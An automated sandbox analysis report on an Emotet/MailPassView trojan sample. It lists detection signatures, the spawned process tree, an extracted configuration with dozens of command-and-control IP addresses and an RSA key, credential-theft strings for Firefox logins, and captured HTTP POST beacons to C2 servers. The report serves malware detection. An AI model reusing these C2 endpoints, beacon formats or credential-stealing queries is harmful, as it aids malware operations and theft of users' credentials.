Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.DownLoader34.14035.15501.25738

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.DownLoader34.14035.15501.25738 (renamed file extension from 25738 to exe)
Analysis ID:255719
MD5:b63b18d6ff8b58a86622ae424446b598
SHA1:cecb0ae6aa67d216e2f6346d038fb4a0e3d9ad21
SHA256:6bc2425885205290a22d3098a0867a7b0c43d4423cc1b30048fa9448637f1b1f

Most interesting Screenshot:

Detection

Emotet MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected MailPassView
Allocates memory in foreign processes
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe (PID: 7112 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe' MD5: B63B18D6FF8B58A86622AE424446B598)
    • clb.exe (PID: 7156 cmdline: C:\Windows\SysWOW64\webservices\clb.exe MD5: B63B18D6FF8B58A86622AE424446B598)
      • clb.exe (PID: 4832 cmdline: 'C:\Windows\SysWOW64\webservices\clb.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp' MD5: B63B18D6FF8B58A86622AE424446B598)
      • clb.exe (PID: 6216 cmdline: 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp' MD5: B63B18D6FF8B58A86622AE424446B598)
      • clb.exe (PID: 1784 cmdline: 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\78FF.tmp' MD5: B63B18D6FF8B58A86622AE424446B598)
      • clboe.exe (PID: 2020 cmdline: 'C:\Windows\SysWOW64\webservices\clboe.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 6476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5112 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4364 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["24.249.135.121:80", "185.94.252.13:443", "149.62.173.247:8080", "50.28.51.143:8080", "80.249.176.206:80", "5.196.35.138:7080", "190.17.195.202:80", "143.0.87.101:80", "190.147.137.153:443", "181.30.69.50:80", "51.255.165.160:8080", "190.96.118.251:443", "72.47.248.48:7080", "178.79.163.131:8080", "212.231.60.98:80", "187.162.248.237:80", "2.47.112.152:80", "68.183.190.199:8080", "192.241.143.52:8080", "77.55.211.77:8080", "87.106.46.107:8080", "191.182.6.118:80", "189.1.185.98:8080", "93.151.186.85:80", "204.225.249.100:7080", "177.73.0.98:443", "137.74.106.111:7080", "219.92.13.25:80", "89.32.150.160:8080", "82.240.207.95:443", "190.6.193.152:8080", "190.163.31.26:80", "190.181.235.46:80", "114.109.179.60:80", "70.32.84.74:8080", "94.176.234.118:443", "77.90.136.129:8080", "217.13.106.14:8080", "212.71.237.140:8080", "82.196.15.205:8080", "181.129.96.162:8080", "104.131.103.37:8080", "83.169.21.32:7080", "177.139.131.143:443", "187.106.41.99:80", "104.131.41.185:8080", "192.241.146.84:8080", "170.81.48.2:80", "181.120.79.227:80", "68.183.170.114:8080", "177.72.13.80:80", "61.92.159.208:8080", "45.161.242.102:80", "179.60.229.168:443", "70.32.115.157:8080", "191.99.160.58:80", "172.104.169.32:8080", "177.66.190.130:80", "71.50.31.38:80", "203.25.159.3:8080", "185.94.252.12:80", "217.199.160.224:7080", "177.74.228.34:80", "177.144.135.2:80", "190.194.242.254:443", "202.62.39.111:80", "201.213.156.176:80", "92.23.34.86:80", "185.94.252.27:443", "104.236.161.64:8080", "181.167.96.215:80", "111.67.12.221:8080", "144.139.91.187:443", "186.250.52.226:8080", "46.28.111.142:7080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000001.1356974391.0000000000400000.00000040.00020000.sdmpAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
00000009.00000001.1356974391.0000000000400000.00000040.00020000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    00000001.00000002.1540176846.0000000000AA0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000001.00000002.1544362683.0000000003AB0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000001.00000003.1354873351.0000000003634000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.clb.exe.31e0000.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            1.3.clb.exe.3c60000.3.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              8.2.clb.exe.400000.0.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                9.1.clb.exe.400000.0.raw.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
                • 0x147b0:$a1: logins.json
                • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
                • 0x14f34:$s4: \mozsqlite3.dll
                • 0x137a4:$s5: SMTP Password
                9.1.clb.exe.400000.0.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                  Click to see the 17 entries

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Suspicious Process CreationShow sources
                  Source: Process startedAuthor: Florian Roth, Daniil Yugoslavskiy, oscd.community (update): Data: Command: 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp', CommandLine: 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\webservices\clb.exe, NewProcessName: C:\Windows\SysWOW64\webservices\clb.exe, OriginalFileName: C:\Windows\SysWOW64\webservices\clb.exe, ParentCommandLine: C:\Windows\SysWOW64\webservices\clb.exe, ParentImage: C:\Windows\SysWOW64\webservices\clb.exe, ParentProcessId: 7156, ProcessCommandLine: 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp', ProcessId: 6216

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 00000001.00000002.1540176846.0000000000AA0000.00000040.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["24.249.135.121:80", "185.94.252.13:443", "149.62.173.247:8080", "50.28.51.143:8080", "80.249.176.206:80", "5.196.35.138:7080", "190.17.195.202:80", "143.0.87.101:80", "190.147.137.153:443", "181.30.69.50:80", "51.255.165.160:8080", "190.96.118.251:443", "72.47.248.48:7080", "178.79.163.131:8080", "212.231.60.98:80", "187.162.248.237:80", "2.47.112.152:80", "68.183.190.199:8080", "192.241.143.52:8080", "77.55.211.77:8080", "87.106.46.107:8080", "191.182.6.118:80", "189.1.185.98:8080", "93.151.186.85:80", "204.225.249.100:7080", "177.73.0.98:443", "137.74.106.111:7080", "219.92.13.25:80", "89.32.150.160:8080", "82.240.207.95:443", "190.6.193.152:8080", "190.163.31.26:80", "190.181.235.46:80", "114.109.179.60:80", "70.32.84.74:8080", "94.176.234.118:443", "77.90.136.129:8080", "217.13.106.14:8080", "212.71.237.140:8080", "82.196.15.205:8080", "181.129.96.162:8080", "104.131.103.37:8080", "83.169.21.32:7080", "177.139.131.143:443", "187.106.41.99:80", "104.131.41.185:8080", "192.241.146.84:8080", "170.81.48.2:80", "181.120.79.227:80", "68.183.170.114:8080", "177.72.13.80:80", "61.92.159.208:8080", "45.161.242.102:80", "179.60.229.168:443", "70.32.115.157:8080", "191.99.160.58:80", "172.104.169.32:8080", "177.66.190.130:80", "71.50.31.38:80", "203.25.159.3:8080", "185.94.252.12:80", "217.199.160.224:7080", "177.74.228.34:80", "177.144.135.2:80", "190.194.242.254:443", "202.62.39.111:80", "201.213.156.176:80", "92.23.34.86:80", "185.94.252.27:443", "104.236.161.64:8080", "181.167.96.215:80", "111.67.12.221:8080", "144.139.91.187:443", "186.250.52.226:8080", "46.28.111.142:7080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeCode function: 0_2_00405DE0 FindFirstFileA,CloseHandle,0_2_00405DE0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeCode function: 0_2_004051E0 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#800,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#800,#800,0_2_004051E0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeCode function: 0_2_00406240 _mbscmp,#535,_mbscmp,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,FindNextFileA,#537,_mbscmp,_mbscmp,#800,FindNextFileA,FindClose,#800,0_2_00406240
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeCode function: 0_2_00405F40 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#1168,#1669,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#1168,#2652,#800,0_2_00405F40
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeCode function: 0_2_00AB286B FindFirstFileW,FindNextFileW,FindClose,0_2_00AB286B
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_0040A1A7 FindFirstFileW,FindNextFileW,8_2_0040A1A7
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_0040A1A7 FindFirstFileW,FindNextFileW,8_1_0040A1A7
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,9_2_0040702D
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_1_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,9_1_0040702D

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.5:49741 -> 24.249.135.121:80
                  Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.5:49746 -> 185.94.252.13:443
                  Source: global trafficHTTP traffic detected: POST /BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/ HTTP/1.1Referer: http://185.94.252.13/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/Content-Type: multipart/form-data; boundary=---------------------------164334098593701User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /Q7mFNVGwni6x9/99n3YC7fq/sNVrwwiCi/eKRD6dJj/ HTTP/1.1Referer: http://185.94.252.13/Q7mFNVGwni6x9/99n3YC7fq/sNVrwwiCi/eKRD6dJj/Content-Type: multipart/form-data; boundary=---------------------------863719401021411User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /GBLe4/W4Nv/ydPu5w08785/PcCvJIjbQ8d3/6tQRWCzD/sbz4tTZNBB/ HTTP/1.1Referer: http://185.94.252.13/GBLe4/W4Nv/ydPu5w08785/PcCvJIjbQ8d3/6tQRWCzD/sbz4tTZNBB/Content-Type: multipart/form-data; boundary=---------------------------686043955318820User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/ HTTP/1.1Referer: http://185.94.252.13/NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/Content-Type: multipart/form-data; boundary=---------------------------517019576768335User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /bGSB/wq53hU8717c/wSHFGtSb/ HTTP/1.1Referer: http://185.94.252.13/bGSB/wq53hU8717c/wSHFGtSb/Content-Type: multipart/form-data; boundary=---------------------------943521983895827User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /E0quz7sA31a/g0uMYR4XCZQfHiW3e/szlRtSgqA7/IptTXI36/IcY0BP4/rL3Kq6cE/ HTTP/1.1Referer: http://185.94.252.13/E0quz7sA31a/g0uMYR4XCZQfHiW3e/szlRtSgqA7/IptTXI36/IcY0BP4/rL3Kq6cE/Content-Type: multipart/form-data; boundary=---------------------------615533192212483User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /vvR8bWnM/ HTTP/1.1Referer: http://88.217.172.65/vvR8bWnM/Content-Type: multipart/form-data; boundary=---------------------------923771852992343User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 88.217.172.65:443Content-Length: 4356Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 24.249.135.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 24.249.135.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 24.249.135.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                  Source: clb.exe, 00000008.00000002.1359995319.0000000000B89000.00000004.00000040.sdmpString found in binary or memory: :///C:/jbxinitvm.au3file://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login+\P equals www.facebook.com (Facebook)
                  Source: clb.exe, 00000008.00000002.1359995319.0000000000B89000.00000004.00000040.sdmpString found in binary or memory: :///C:/jbxinitvm.au3file://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login+\P equals www.yahoo.com (Yahoo)
                  Source: clb.exe, 00000001.00000003.1361095704.00000000035B1000.00000004.00000001.sdmp, clb.exe, 00000008.00000002.1359416111.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: clb.exe, 00000001.00000003.1361095704.00000000035B1000.00000004.00000001.sdmp, clb.exe, 00000008.00000002.1359416111.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: clb.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: unknownHTTP traffic detected: POST /BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/ HTTP/1.1Referer: http://185.94.252.13/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/Content-Type: multipart/form-data; boundary=---------------------------164334098593701User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                  Source: clb.exe, 00000001.00000003.1350151621.00000000028F2000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/
                  Source: clb.exe, 00000001.00000003.1350151621.00000000028F2000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/D
                  Source: clb.exe, 00000001.00000003.1361095704.00000000035B1000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13/E0quz7sA31a/g0uMYR4XCZQfHiW3e/szlRtSgqA7/IptTXI36/IcY0BP4/rL3Kq6cE/
                  Source: clb.exe, 00000001.00000003.1353410028.0000000002934000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13/NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/
                  Source: clb.exe, 00000001.00000003.1355037136.00000000028F1000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13/bGSB/wq53hU8717c/wSHFGtSb/
                  Source: clb.exe, 00000001.00000003.1350151621.00000000028F2000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/
                  Source: clb.exe, 00000001.00000003.1350151621.00000000028F2000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/l
                  Source: clb.exe, 00000001.00000003.1350151621.00000000028F2000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/l8
                  Source: clb.exe, 00000001.00000003.1361095704.00000000035B1000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/E0quz7sA31a/g0uMYR4XCZQfHiW3e/szlRtSgqA7/IptTXI36/IcY0BP4/rL3Kq6cE/
                  Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/GBLe4/W4Nv/ydPu5w08785/PcCvJIjbQ8d3/6tQRWCzD/sbz4tTZNBB/
                  Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/
                  Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/3
                  Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/3u?
                  Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/Q7mFNVGwni6x9/99n3YC7fq/sNVrwwiCi/eKRD6dJj/
                  Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/Q7mFNVGwni6x9/99n3YC7fq/sNVrwwiCi/eKRD6dJj/8
                  Source: clb.exe, 00000001.00000002.1543020100.0000000002864000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/bGSB/wq53hU8717c/wSHFGtSb/
                  Source: clb.exe, 00000001.00000003.1348908670.00000000028F2000.00000004.00000001.sdmpString found in binary or memory: http://24.249.135.121/wZdeJSL0EbI/ns6yVpoXfN5ksGZ/Twx96ym8yu/gPurzYuXl2fojzE/
                  Source: clb.exe, 00000001.00000003.1348868181.00000000028F0000.00000004.00000001.sdmpString found in binary or memory: http://24.249.135.121/wZdeJSL0EbI/ns6yVpoXfN5ksGZ/Twx96ym8yu/gPurzYuXl2fojzE/5
                  Source: clb.exe, 00000001.00000002.1543331576.00000000028E2000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65/vvR8bWnM/
                  Source: clb.exe, 00000001.00000002.1543020100.0000000002864000.00000004.00000001.sdmp, clb.exe, 00000001.00000002.1543550712.0000000002946000.00000004.00000001.sdmp, clb.exe, 00000001.00000002.1543378730.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/vvR8bWnM/
                  Source: clb.exe, 00000001.00000002.1543378730.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/vvR8bWnM/$
                  Source: clb.exe, 00000001.00000002.1543378730.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/vvR8bWnM/6Eu/I
                  Source: clb.exe, 00000001.00000002.1543378730.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/vvR8bWnM/JX
                  Source: clb.exe, 00000001.00000002.1543550712.0000000002946000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/vvR8bWnM/L
                  Source: clb.exe, 00000001.00000002.1543020100.0000000002864000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/vvR8bWnM/ys
